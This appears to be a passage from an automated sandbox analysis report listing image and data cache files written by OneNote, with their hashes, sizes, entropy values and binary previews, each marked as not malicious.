SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000053.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3445866317121675
Encrypted:	false
SSDEEP:	48:KxsSZ8joA/TFtRTnbED50kBXQkB9uzoRrdQqrPzZBXjFmobU4a/CWod:KxsF/TF3nE2AXQA9uzQRQyP1Se5
MD5:	F134AFE30C278A23B23B9756FE99B996
SHA1:	CF2A68F873BCEFB4833B4E7A2E34956F5BF6C9D9
SHA-256:	539C3A0AC4E0CDEAC2F292FACD810C250B7F2A5A23CF8113A70710032436A04B
SHA-512:	27FC3F8660552675FD3A58DC670D0D904E67F54501B5D070B04DC0D0DF38357A6EC176D68E437A095F1F7FC1CFF8318DBF6DF020636E7D36879BE7CE0BD5ED08
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.1......1..>..3...w.!A.1..>..3...w.!A.1..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............L..b3..5...^Q.O....N...^.................-fZ6C....\|...........f........................................I.qk..B.....LZ.............L..b3..5...^Q.O.........L..b3..5...^Q.O..........1......1......1..........................................1j.....1T.]...1......1..B...1H.....1..B...1..>.).1..J...................;........4...4...4.."...............1..1..1..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........1......1....#.1............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000055.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.329070915402667
Encrypted:	false
SSDEEP:	48:YuOs9weMu4eeUbtgHuSEuVLdQXY9mp7oxrdQqrzYxBX7xwyLuJPx/x7fqJ:YhsreUbKOSEuVRQXY9mp7wRQyol2Hq
MD5:	ED576D6EA639D4D246D58582301D15E2
SHA1:	D0C834C8DBC7B5C0D73B7351DBA725D8E2BB6758
SHA-256:	7AC0CC974DBC37DCDB33511287143563D2A54F471C2FB9C489458C1DA61CEFF0
SHA-512:	F2D5E2BFFCC8E6AB2D26494D5DD127C681A472FDA01D66552B97F255E1C8E0EA949FA74B3DA49247951D7533FEC447D6D35CCB021F0AC4E5EC54F26CB6A8FEFE
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.+&......+&.....0......t.+&.....0......t.+&..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............}?.....)m.n-......N...^...............>..4_.N....Z.6.........f........................................I.qk..B.....LZ.............}?.....)m.n-...........}?.....)m.n-............+&......+&......+&..........................................+&j.....+&T.]...+&......+&..B...+&H.....+&..B...+&..>.).+&..J...................;........4...4...4.."...............+&..+&..+&..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........+&......+&....#.+&............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000057.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.339477932528002
Encrypted:	false
SSDEEP:	96:YbBsg7Ewsa/rLmEr7vXA9ef8RQyr2jEwy0+ga:WBsg73saTvr7vXA9ef8RJra3y0+g
MD5:	78DB96337B919A24D33A84F2BBAB50F4
SHA1:	6E9BA344E61DD01A584AEC06962E362F67C1FBE7
SHA-256:	A36EEC7B334702AAA462F3C13053CFF003C469D8CFB931B5299FAF4BD23086EA
SHA-512:	B0C838ED07C4C4498D70136AF82FA241E076528B494548D6A6B2196DC2A3337C11100FE5EB40752083ECE283072B034A82478ADFFFD61063ABA6291E6804A496
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ'.;.....'.;!......(DG.e.'.;!......(DG.e.'.;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............9...e....b...S.....N...^.................A.$.pJ./..~}~.........f........................................I.qk..B.....LZ............9...e....b...S.........9...e....b...S..........'.;.....'.;.....'.;.........................................'.;j....'.;T.]..'.;.....'.;..B..'.;H....'.;..B..'.;..>.)'.;..J...................;........4...4...4.."..............'.;.'.;.'.;..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........'.;.....'.;....#'.;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000059.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345828344538076
Encrypted:	false
SSDEEP:	96:Y1WqsIOpmIdIsEPJXle9e8xKRQyFMIFMjlQ:KsI1IuPJXw9e8xKRJ2I2j
MD5:	30D0BAF75508C2FCF691BE5F2259AD5E
SHA1:	FC7A5801EB2A42FC88BF4301FE983F6E8B086791
SHA-256:	A759AA739A08E079494371D8EBFF8E12C0C38E90A81A24879B607D76C49C34A5
SHA-512:	944A2C75803F53D7CBDDBA4D39F44FDB108DBD2E9858234EC506C3FFDC38170B29A4C5D76E4F1353FAD729C35A9426581E189E7DEA57F5E726A59769DF7A59D9
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ...........N..v.,..Zu......N..v.,..Zu........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............;.K...H.&w.k.5.....N...^................+...M^K.k-.rw..........f........................................I.qk..B.....LZ............;.K...H.&w.k.5.........;.K...H.&w.k.5.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.309860154508284
Encrypted:	false
SSDEEP:	48:ssQSsGTItNEWE+YlLMXx29ugoVrdQqrzQ8SBXak9oG5:ss0oIzHEpl4Xx29ugURQyk8Sj
MD5:	7B4F12A349F6653AC03437272EBC19E7
SHA1:	3E367A6EC11E66C688E666DB38A775E8E3C382A5
SHA-256:	29891BB82498ECF41DEEEC134E73A16117ADDA09677D189A4207AA5E8B548267
SHA-512:	BD8D0E6E766583776975B46AF3AFA15F302F8068833F4050C437C8F6B6BD54B5E730D0ED9B9FE9654DA76B860946AA53ED56818E531FE83981500E59098C7C0F
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.X.......X........U.?.U.X........U.?.U.X...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................g.../...c..b....N...^................Q.K...G...s..8A........f........................................I.qk..B.....LZ...............g.../...c..b...........g.../...c..b..........X.......X.......X...........................................X.j.....X.T.]...X.......X...B...X.H.....X...B...X...>.).X...J...................;........4...4...4.."...............X...X...X...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........X.......X.....#.X.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.614579976967333
Encrypted:	false
SSDEEP:	48:NsQfl+GdN4t0Y9DE3/L60X4heN9CFoY4rdQqrLJwBXxbYAAaYe/AXR1R:NsL8N4KsE3/hX19CFv4RQyyq
MD5:	23AEFDE5AA9C0B0B229BE131AF483DC7
SHA1:	AAF4D13DE62E113E976B978811DD307E624DB0A2
SHA-256:	474968DD4DBD5D2A872B5EB9A1BCA0F9196E5D18AA4480B8D547C4A9CEEC19B5
SHA-512:	1A15C0F3A6DE1CDCCB3112F627AAF7F99A30426E91F4B03940EC77C8AD8657D6799B371472C2F44C59BC58C1E8E5B1385CF9CB329D8175CD8976E0D36356B3E9
Malicious:	false
Preview:	2...>...........v...~...................................................................................................................................2...>...f.......v................................I.......I.qk..B.....LZ@${.....@${ec....,a.b../@${ec....,a.b../@${..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................7.U..4.&..Z....N...^................o....rO.....!........f...................................:....I.qk..B.....LZ...............7.U..4.&..Z...........7.U..4.&.*.Z.........@${.....@${.....@${.........................................@${j....@${T.]..@${.....@${..B..@${H....@${..B..@${..>.)@${..J...................;........4...4...4.."..............@${.@${.@${..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........@${.....@${....#@${............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3300705431473006
Encrypted:	false
SSDEEP:	96:YdsN7jZMgGaEXMR7X89KYcRQywUuL6Puo47J:esNHZMz3XMR7X89KYcRJw
MD5:	1F30F4149397B56A9441A39EFB4962A6
SHA1:	FF3378480B31AE7EEC91000D0E1A7057257C2449
SHA-256:	CC70BD082A0CE494AF95FFC851D0F34E5557218CD266EEE5A26469370CBD0992
SHA-512:	7A8E361FB2637CF8788C31B4A7ED9C2B79757F52B1743AFE529682726D0448322E8E6AB7A5A9BF42FAA138EE87172D7051E4B425A7CCF1C8A9475A32D2AFFB31
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.z......z\|.......'Mi..z\|.......'Mi..z..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v3d.g@j.41....<.....N...^.................\..UUJ......P.........f........................................I.qk..B.....LZ............v3d.g@j.41....<.........v3d.g@j.41....<...........z......z......z..........................................zj.....zT.]...z......z..B...zH.....z..B...z..>.).z..J...................;........4...4...4.."...............z..z..z..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........z......z....#.z............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3146482526253624
Encrypted:	false
SSDEEP:	48:SsXU06BNaXpzV4t1lE5VLPBXgM9W5/oNrdQqrEwJyBXlma3JBNanH2/QQxboath3:Ssw6pzV41E5VtXgM9WNcRQyCP7l
MD5:	1DA9D86428D8F8BE8A14FB0FF672F931
SHA1:	83B5DA50D4D0993D1D11138CFF341BE3384340E9
SHA-256:	C5998CABE3D9907D516B8DA445C5FC25A3A3E17B7DD24AF36EB12F70891FD702
SHA-512:	6436F4963523AA881E1F6BD41B6690645019BD5B87A7607E989DFD50EE71BEA003356B1DB39A5214208786887C8B5B92A5435B0CA25F69AD4789314A02B96425
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..i.......i....1....]..i....1....]..i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............C..)Cg....0...H....N...^...............KY.l..WA.#.Es..x........f........................................I.qk..B.....LZ.............C..)Cg....0...H.........C..)Cg....0...H...........i.......i.......i...........................................ij......iT.]....i.......i..B....iH......i..B....i..>.)..i..J...................;........4...4...4.."................i...i...i..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........i.......i....#..i............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
